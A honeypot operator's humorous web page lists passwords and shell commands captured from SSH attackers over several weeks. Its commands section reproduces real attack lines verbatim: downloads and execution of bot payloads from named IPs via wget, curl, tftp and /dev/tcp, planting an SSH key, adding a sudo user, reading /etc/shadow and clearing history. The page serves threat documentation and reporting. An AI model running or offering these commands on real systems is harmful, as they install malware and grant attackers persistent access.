All time 🤣 hall of shame

Attacker Comedy Corner

Real passwords and commands attempted by automated scanners and script kiddies. Every entry below is a genuine attempt captured by the honeypot. No fiction.

61 Unique Funny Passwords
238 Total Attempts
37 Noteworthy Commands
44 Days with Comedy Data

🔑 PASSWORD HALL OF SHAME

#1 admin 📦 Default Creds ×37 days
#2 password 🤬 Angry ×32 days
#3 abc123 😶 Generic ×26 days
#4 ubuntu 😶 Generic ×14 days
#5 1qaz@WSX 😶 Generic ×13 days
#6 345gs5662d34 😶 Generic ×11 days
#7 3245gs5662d34 😶 Generic ×10 days
#8 qwe123 😶 Generic ×8 days
#9 admin123 📦 Default Creds ×7 days
#10 solana 😶 Generic ×6 days
#11 qwerty ⌨️ Keyboard Walk ×5 days
#12 123456789 🔢 Numbers Only ×4 days
#13 111111 🔢 Numbers Only ×3 days
#14 12345678 🔢 Numbers Only ×3 days
#15 91566946b1d8deb0 😶 Generic ×3 days
#16 aad3f9ba1d6740cc 😶 Generic ×3 days
#17 1234567890%*() 😶 Generic ×3 days
#18 8d969eef6ecad3c2 😶 Generic ×2 days
#19 Q1w2e3r4 😶 Generic ×2 days
#20 \xef\xbb\xbf------fuck------ 🤬 Angry ×2 days
#21 fjbdfdjkdsfs541544AA@@ 😶 Generic ×2 days
#22 P@ssw0rd 😶 Generic ×2 days
#23 qwer1234 😶 Generic ×2 days
#24 123321 🔢 Numbers Only
#25 696969 🔢 Numbers Only
#26 1234567890 🔢 Numbers Only
#27 6e86f2270ed47801 😶 Generic
#28 6460662e217c7a9f 😶 Generic
#29 ebf20cefc9169e0b 😶 Generic
#30 8c6976e5b5410415 😶 Generic
#31 5e884898da280471 😶 Generic
#32 6b86b273ff34fce1 😶 Generic
#33 08fb832e6bca8d07 😶 Generic
#34 razors 😶 Generic
#35 rangers9 😶 Generic
#36 1qaz2wsx 😶 Generic
#37 Voidsetdownload.so 😶 Generic
#38 fjbdfdjkdsfs541544@@ 😶 Generic
#39 socks 😶 Generic
#40 sollet 😶 Generic
#41 raydium 😶 Generic
#42 qwertyuiop ⌨️ Keyboard Walk
#43 warnight 😶 Generic
#44 validator 😶 Generic
#45 ---fuck_you---- 🤬 Angry
#46 <empty> 😶 Generic
#47 support 😶 Generic
#48 123321z 😶 Generic
#49 1234567890-= 😶 Generic
#50 1q2w3e4r ⌨️ Keyboard Walk
#51 chi1234567890 😶 Generic
#52 master 😶 Generic
#53 000000000000000 🔢 Numbers Only
#54 azerty147 ⌨️ Keyboard Walk
#55 iloveyou 💕 Romantic
#56 letmein 🙏 Polite
#57 admin1234 📦 Default Creds
#58 qwerty123 ⌨️ Keyboard Walk
#59 fuckyou 🤬 Angry
#60 opensesame 🙏 Polite
#61 password1 🤬 Angry

💻 COMMANDS THEY ACTUALLY RAN

Run against a fake shell. The attacker thought they were in. They were not.

#1 uname -a ×30 days
#2 uname -s -m ×29 days
#3 uname -s -v -n -r -m ×22 days
#4 /bin/./uname -s -v -n -r -m ×14 days
#5 cd ~ && rm -rf .ssh && mkdir .ssh && echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×12 days
#6 uname -a;w ×8 days
#7 cd ~ && rm -rf .ssh && mkdir .ssh && echo $_dqssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr$_dq>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×3 days
#8 uname -m ×3 days
#9 uname ×2 days
#10 uname -a ; echo vT ×2 days
#11 unset HISTFILE; uname -a; history -c ×2 days
#12 uname -a; echo -e $_dq\x61\x75\x74\x68\x5F\x6F\x6B\x0A$_dq; (wget --no-check-certificate -qO- https://80.27.83.195/sh || curl -sk https://80.27.83.195/sh) | sh -s ssh
#13 uname -s
#14 whoami
#15 chmod 777 meow
#16 chmod 777 meowarm64
#17 curl -O http://34.181.210.37/meow
#18 curl -O http://34.181.210.37/meowarm64
#19 echo $(whoami):modzmodz | chpasswd
#20 echo SSHCHK_60d0f906918c_BEGIN; uname -srm; echo $((7*191+3)); hostname; df -P / 2>/dev/null | awk NR==2{print $1}; echo SSHCHK_60d0f906918c_END
#21 cd /tmp || cd /run || cd /; wget http://45.81.234.64/10Gbins.sh; chmod 777 10Gbins.sh; sh 10Gbins.sh; tftp 45.81.234.64 -c get 10Gtftp1.sh; chmod 777 10Gtftp1.sh; sh 10Gtftp1.sh; tftp -r 10Gtftp2.sh -g 45.81.234.64; chmod 777 10Gtftp2.sh; sh 10Gtftp2.sh; rm -rf 10Gbins.sh 10Gtftp1.sh 10Gtftp2.sh; rm -rf *
#22 apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 FDX3YvE6) system && sudo usermod -aG sudo system
#23 apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 X6Ah8NdN) system && sudo usermod -aG sudo system
#24 echo CANARY-b258944ae9af040c-AWK$(awk BEGIN{print 7*191} 2>/dev/null)-PY$(python3 -c print(1+1) 2>/dev/null||python -c print(1+1) 2>/dev/null)-NPROC$(nproc 2>/dev/null)-END && lscpu -J && echo -e X6Ah8NdN\nX6Ah8NdN | passwd && curl https://ipinfo.io/org --insecure -s && free -h && apt
#25 export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c ^processor /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E model name|Hardware /proc/cpuinfo | cut -d: -f2- | sed s/^ *//;s/ *$// ; lscpu 2>/dev/null | awk -F: /Model name/ {gsub(/^ +| +$/,,$2); print $2; exit} ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk NF{print; exit} ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr \n ) || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr \n ) || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo UNAME:$uname; echo ARCH:$arch; echo UPTIME:$uptime; echo CPUS:$cpus; echo CPU_MODEL:$cpu_model; echo GPU:$gpu_info; echo CAT_HELP:$cat_help; echo LS_HELP:$ls_help; echo LAST:$last_output
#26 uname -m 2 > /dev/null
#27 id; cd /tmp || cd /var || cd /dev/shm || cd /; rm -f .x 2>/dev/null; wget -U Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 -q -O .x http://91.214.78.173:5050/payloads/bot-amd64 2>/dev/null || busybox wget -q -O .x http://91.214.78.173:5050/payloads/bot-amd64 2>/dev/null || curl -A Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 -s -o .x http://91.214.78.173:5050/payloads/bot-amd64 2>/dev/null || tftp -g -l .x -r payloads/bot-amd64 91.214.78.173 2>/dev/null; chmod 777 .x 2>/dev/null; ls -la .x 2>/dev/null; ./.x --c2 91.214.78.173:5052 & sleep 3; ps | grep [.]x; cat /proc/meminfo 2>/dev/null | head -1
#28 nohup $SHELL -c curl http://47.83.203.183:60138/linux -o /tmp/S65kW5FM3P; if [ ! -f /tmp/S65kW5FM3P ]; then wget http://47.83.203.183:60138/linux -O /tmp/S65kW5FM3P; fi; if [ ! -f /tmp/S65kW5FM3P ]; then exec 6<>/dev/tcp/47.83.203.183/60138 && echo -n GET /linux >&6 && cat 0<&6 > /tmp/S65kW5FM3P ; chmod +x /tmp/S65kW5FM3P && /tmp/S65kW5FM3P Ju4Xfq5S585yXw1SJSxPBFlw0edSoH0U4F9T4BF5rlru1nBeDkg0J0UQXnDV+lu5ew3/VFD0FXmxW+bAc1YQTSQiUg9Wcs7mWLdzFf5WVvcDerlE5dB2QQ9EJzpOClx61uRbsn8D/V5J/xN/rlvm1G5WDUYiJE0OWmDU40S5fA38U1XgEnq5UOLQcV8JXCctUg9fds7lXLlnEvxRXfgTeLJe9NFwXhBOJCRSD1tu0eJZun8T/1NV7htnsV/mznFZD1InIkYIX3HS5kqzcA3/V1HgEni5ROXQcVUITCUkTR5cec7lWrVnEf9fSfoac7Za5dNwTw1FOiVMC0F31vpbsnMV/lZX+QN6uUTl0HZBD0UnOk8JVXbQ5Vm4aRf5SV/9DXuwWfrReFwESiQlTwZPc9n6W7B+Df9VU+AVerpc5NFxXB5IIzpFC0Fy1O1EsXsZ+FdW/hBptF362XVBD04mOk4PVnrW5Fu0fAP7Vkn3Eme3XPrReFcESiQlSA5Pc9n6W7B/Df9fV+ASe7pc5NFyWR5PLTpNDllu0udbrngS+F1R/hJ7uErn2W5eDko6JUUPQXHZ51C2eRL6Xkf6FGe5X/rRclsQTiYiRghfcdPiSrNwDf9XUOASeLVE4dR6WQ5NICxcDVZu0eRfrnsR/klW/BBztlrl03FPDUU6JUwIQXPW+lizfRn4V1b6EWmzU/rRcFkQTS0kUg1YetbkW7F/A/pQSfcQZ7JY7M5xXAxGIiRNDFlg0+1EsXkV4FZf+A1/slDi0HFeDFwgI1IHWm7S4F2ueBP9XVH+Enmwiv49A8FE8PKrOF/zoLSPYVfrEiQuQUoeMO2HnQ==; fi; echo password > /tmp/.opass; chmod +x /tmp/S65kW5FM3P && /tmp/S65kW5FM3P Ju4Xfq5S585yXw1SJSxPBFlw0edSoH0U4F9T4BF5rlru1nBeDkg0J0UQXnDV+lu5ew3/VFD0FXmxW+bAc1YQTSQiUg9Wcs7mWLdzFf5WVvcDerlE5dB2QQ9EJzpOClx61uRbsn8D/V5J/xN/rlvm1G5WDUYiJE0OWmDU40S5fA38U1XgEnq5UOLQcV8JXCctUg9fds7lXLlnEvxRXfgTeLJe9NFwXhBOJCRSD1tu0eJZun8T/1NV7htnsV/mznFZD1InIkYIX3HS5kqzcA3/V1HgEni5ROXQcVUITCUkTR5cec7lWrVnEf9fSfoac7Za5dNwTw1FOiVMC0F31vpbsnMV/lZX+QN6uUTl0HZBD0UnOk8JVXbQ5Vm4aRf5SV/9DXuwWfrReFwESiQlTwZPc9n6W7B+Df9VU+AVerpc5NFxXB5IIzpFC0Fy1O1EsXsZ+FdW/hBptF362XVBD04mOk4PVnrW5Fu0fAP7Vkn3Eme3XPrReFcESiQlSA5Pc9n6W7B/Df9fV+ASe7pc5NFyWR5PLTpNDllu0udbrngS+F1R/hJ7uErn2W5eDko6JUUPQXHZ51C2eRL6Xkf6FGe5X/rRclsQTiYiRghfcdPiSrNwDf9XUOASeLVE4dR6WQ5NICxcDVZu0eRfrnsR/klW/BBztlrl03FPDUU6JUwIQXPW+lizfRn4V1b6EWmzU/rRcFkQTS0kUg1YetbkW7F/A/pQSfcQZ7JY7M5xXAxGIiRNDFlg0+1EsXkV4FZf+A1/slDi0HFeDFwgI1IHWm7S4F2ueBP9XVH+Enmwiv49A8FE8PKrOF/zoLSPYVfrEiQuQUoeMO2HnQ== &
#29 cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps
#30 echo cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps | sh
#31 uname -a ; echo 'vT'
#32 busybox wget http://194.165.16.78/bot.sh -O /tmp/.x && chmod +x /tmp/.x && /tmp/.x
#33 cat /etc/shadow
#34 history -c
#35 chmod 777 /tmp/.x
#36 echo AAAA >> /root/.ssh/authorized_keys
#37 python3 -c import pty;pty.spawn(/bin/bash)

📅 COMEDY BY DAY

2026-06-10 5 passwords · 1 commands → 2026-06-09 5 passwords · 5 commands → 2026-06-08 5 passwords · 5 commands → 2026-06-04 5 passwords · 5 commands → 2026-06-03 5 passwords · 5 commands → 2026-06-02 5 passwords · 4 commands → 2026-06-01 5 passwords · 5 commands → 2026-05-31 5 passwords · 3 commands → 2026-05-30 5 passwords · 5 commands → 2026-05-29 5 passwords · 2 commands → 2026-05-28 5 passwords · 2 commands → 2026-05-27 5 passwords · 4 commands → 2026-05-26 5 passwords · 3 commands → 2026-05-25 5 passwords · 3 commands → 2026-05-24 5 passwords · 5 commands → 2026-05-23 5 passwords · 5 commands → 2026-05-22 5 passwords · 3 commands → 2026-05-21 5 passwords · 2 commands → 2026-05-20 5 passwords · 1 commands → 2026-05-19 5 passwords · 3 commands → 2026-05-18 5 passwords · 3 commands → 2026-05-17 5 passwords · 3 commands → 2026-05-16 5 passwords · 5 commands → 2026-05-15 5 passwords · 4 commands → 2026-05-14 5 passwords · 4 commands → 2026-05-13 5 passwords · 4 commands → 2026-05-12 5 passwords · 2 commands → 2026-05-11 5 passwords · 3 commands → 2026-05-10 5 passwords · 4 commands → 2026-05-09 5 passwords · 4 commands → 2026-05-08 5 passwords · 2 commands → 2026-05-07 5 passwords · 3 commands → 2026-05-06 5 passwords · 4 commands → 2026-05-05 5 passwords · 4 commands → 2026-05-04 5 passwords · 4 commands → 2026-05-03 5 passwords · 4 commands → 2026-05-02 5 passwords · 4 commands → 2026-05-01 5 passwords · 4 commands → 2026-04-30 5 passwords · 4 commands → 2026-04-29 5 passwords · 5 commands → 2026-04-27 10 passwords · 1 commands → 2026-04-26 10 passwords · 1 commands → 2026-04-25 10 passwords · 0 commands → 2026-04-24 8 passwords · 6 commands →
All data is real. IPs have been reported to AbuseIPDB, Blocklist.de, SANS DShield, and AlienVault OTX. The attackers remain unaware they were in a fake shell powered by a Raspberry Pi 5.